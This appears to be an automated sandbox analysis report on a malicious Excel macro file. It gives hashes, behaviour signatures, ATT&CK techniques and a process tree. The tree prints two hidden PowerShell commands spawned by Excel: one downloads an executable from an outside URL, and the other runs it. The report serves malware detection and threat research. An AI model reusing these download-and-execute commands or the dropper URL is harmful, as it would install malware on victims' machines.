Analysis

  • max time kernel
    100s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 12:37

General

  • Target

    bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3.xlsm

  • Size

    12KB

  • MD5

    48be1f1540b9ffd903f32f3ab506c144

  • SHA1

    4232cf65dfd13f7a76babe43867aa9716237b49c

  • SHA256

    bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3

  • SHA512

    d2a831c737ed1b599298c3af60f976d6c90a943b32c62b87cc2bbe912fb1a3cdcbc382482cbcd2b53e846868ddf26f01d743753f88ea3d8c2874cfb6bf489815

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://swiftexpresscourier.vip/SH/cov.exe

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://swiftexpresscourier.vip/SH/cov.exe',$env:Temp+'\Filename.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1236
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -executionpolicy bypass -W Hidden -command (New-Object -com Shell.Application).ShellExecute($env:Temp+'\Filename.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    79e716a27dfe46d8020f9bcf041397cf

    SHA1

    5a9738a35c8eb53b43f6a37ac38b3298b145ce5a

    SHA256

    5cf281534be73c38a49ab78084b81b3f1384fb2d9cb7f13e50d08f17d0a35e5f

    SHA512

    6533dc849f98f1749b2bb6abb65d5a4f1ed4059a41ce248fc54586013fb926f58c1d849fbd0fe281e13807f0ced4f208bde655af8af9f18af1d3093a6a32990d

  • memory/1236-65-0x0000000000000000-mapping.dmp
  • memory/1236-68-0x000000006C690000-0x000000006CC3B000-memory.dmp
    Filesize

    5.7MB

  • memory/1552-57-0x00000000726FD000-0x0000000072708000-memory.dmp
    Filesize

    44KB

  • memory/1552-58-0x0000000075B61000-0x0000000075B63000-memory.dmp
    Filesize

    8KB

  • memory/1552-54-0x000000002F401000-0x000000002F404000-memory.dmp
    Filesize

    12KB

  • memory/1552-67-0x000000006A281000-0x000000006A283000-memory.dmp
    Filesize

    8KB

  • memory/1552-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1552-55-0x0000000071711000-0x0000000071713000-memory.dmp
    Filesize

    8KB

  • memory/1552-72-0x0000000068DE1000-0x0000000068DE3000-memory.dmp
    Filesize

    8KB

  • memory/1552-74-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2044-69-0x0000000000000000-mapping.dmp
  • memory/2044-73-0x000000006C690000-0x000000006CC3B000-memory.dmp
    Filesize

    5.7MB